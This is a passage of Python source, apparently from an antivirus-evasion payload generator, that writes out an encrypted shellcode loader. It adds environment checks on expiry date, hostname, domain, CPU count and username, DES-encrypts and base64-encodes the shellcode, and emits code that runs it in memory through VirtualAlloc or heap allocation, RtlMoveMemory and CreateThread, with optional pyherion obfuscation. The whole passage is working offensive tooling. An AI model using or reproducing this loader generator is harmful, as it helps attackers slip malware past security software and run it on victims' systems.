payload_code += '\t' * num_tabs_required + 'from datetime import date\n'
payload_code += '\t' * num_tabs_required + RandToday + ' = datetime.now()\n'
payload_code += '\t' * num_tabs_required + RandExpire + ' = datetime.strptime(\"' + expiredate[
2:] + '\",\"%y-%m-%d\") \n'
payload_code += '\t' * num_tabs_required + 'if ' + RandToday + ' < ' + RandExpire + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["HOSTNAME"][0].lower() != "x":
rand_hostname = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import platform\n'
payload_code += '\t' * num_tabs_required + rand_hostname + ' = platform.node()\n'
payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options[
"HOSTNAME"][0].lower(
) + '\" in ' + rand_hostname + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["DOMAIN"][0].lower() != "x":
rand_domain = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import socket\n'
payload_code += '\t' * num_tabs_required + rand_domain + ' = socket.getfqdn()\n'
payload_code += '\t' * num_tabs_required + 'if \"' + self.required_options[
"DOMAIN"][0].lower() + '\" in ' + rand_domain + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["PROCESSORS"][0].lower() != "x":
rand_processor_count = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import multiprocessing\n'
payload_code += '\t' * num_tabs_required + rand_processor_count + ' = multiprocessing.cpu_count()\n'
payload_code += '\t' * num_tabs_required + 'if ' + rand_processor_count + ' >= ' + self.required_options[
"PROCESSORS"][0] + ':\n'
# Add a tab for this check
num_tabs_required += 1
if self.required_options["USERNAME"][0].lower() != "x":
rand_user_name = evasion_helpers.randomString()
payload_code += '\t' * num_tabs_required + 'import getpass\n'
payload_code += '\t' * num_tabs_required + rand_user_name + ' = getpass.getuser()\n'
payload_code += '\t' * num_tabs_required + 'if \'' + self.required_options[
"USERNAME"][0].lower(
) + '\' in ' + rand_user_name + '.lower():\n'
# Add a tab for this check
num_tabs_required += 1
# encrypt the shellcode and get our randomized key
encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption(
Shellcode)
encoded_ciphertext = encoded_ciphertext.decode('ascii')
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
# Generate Random Variable Names
HeapVar = evasion_helpers.randomString()
# Create Payload File
payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import DES\n'
payload_code += '\t' * num_tabs_required + 'import base64\n'
payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
payload_code += '\t' * num_tabs_required + RandDESPayload + ' = DES.new(\'' + encryption_key + '\', DES.MODE_CBC, \'' + iv_value + '\')\n'
payload_code += '\t' * num_tabs_required + RandEncShellCodePayload + ' = \'' + encoded_ciphertext + '\'\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = base64.b64decode(' + RandEncShellCodePayload + ')\n'
payload_code += '\t' * num_tabs_required + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + ShellcodeVariableName + ')\n'
payload_code += '\t' * num_tabs_required + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
payload_code += '\t' * num_tabs_required + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
payload_code += '\t' * num_tabs_required + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
payload_code += '\t' * num_tabs_required + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'
if self.required_options["USE_PYHERION"][0].lower() == "y":
payload_code = encryption.pyherion(payload_code)
self.payload_source_code = payload_code
return
